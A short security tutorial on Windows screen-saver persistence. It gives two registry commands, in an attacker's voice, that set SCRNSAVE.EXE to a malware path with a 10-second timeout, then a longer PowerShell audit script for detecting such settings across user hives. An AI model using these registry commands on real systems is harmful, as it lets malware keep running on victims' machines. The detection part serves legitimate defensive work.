Screen Savers

Screen savers are triggered by user inactivity. We can set the screen saver to run our malware after a certain period of inactivity to achieve persistence.

To do this, issue the following command:

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "c:\exec" /f

To configure the period of user inactivity (in seconds) before our screen saver launches:

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f
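
From the defender's side, the two values set above can be audited in every loaded user hive. The PowerShell below is an added example, not part of the original page; the function name Test-ScreenSaverSetting, the 60-second floor and the System32/SysWOW64 allow-list are assumptions to tune for your environment.

```powershell
# Added audit example, not from the original page. The 60-second floor and
# the System32/SysWOW64 allow-list are assumptions; tune for your environment.
function Test-ScreenSaverSetting {
    param(
        [string]$Path,           # data of SCRNSAVE.EXE
        [string]$TimeoutSec,     # data of ScreenSaveTimeOut (REG_SZ, seconds)
        [int]$MinTimeout = 60    # assumed lowest plausible user-chosen timeout
    )
    $reasons = @()
    $allowed = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")
    $full = [Environment]::ExpandEnvironmentVariables($Path.Trim('"'))
    # Legitimate screen savers are .scr files shipped in the system directory.
    if ([IO.Path]::GetExtension($full) -ne '.scr') {
        $reasons += 'target does not have a .scr extension'
    }
    if ($allowed -notcontains [IO.Path]::GetDirectoryName($full)) {
        $reasons += 'target is not in System32 or SysWOW64'
    }
    # A very short timeout makes the target run almost immediately when idle.
    $t = 0
    if ([int]::TryParse($TimeoutSec, [ref]$t) -and $t -lt $MinTimeout) {
        $reasons += "timeout of $t s is below $MinTimeout s"
    }
    return ,$reasons
}

# HKEY_USERS only holds loaded hives; run elevated to see other logged-on users.
Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue | ForEach-Object {
    $key = "Registry::$($_.Name)\Control Panel\Desktop"
    $d = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($d -and $d.'SCRNSAVE.EXE') {
        $why = Test-ScreenSaverSetting -Path $d.'SCRNSAVE.EXE' -TimeoutSec $d.ScreenSaveTimeOut
        if ($why.Count -gt 0) {
            [pscustomobject]@{
                Hive    = $_.Name
                Target  = $d.'SCRNSAVE.EXE'
                Timeout = $d.ScreenSaveTimeOut
                Reasons = $why -join '; '
            }
        }
    }
}
```

With the values from the commands above, a hive is reported for all three reasons: no .scr extension, a target outside the system directory, and a 10-second timeout.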
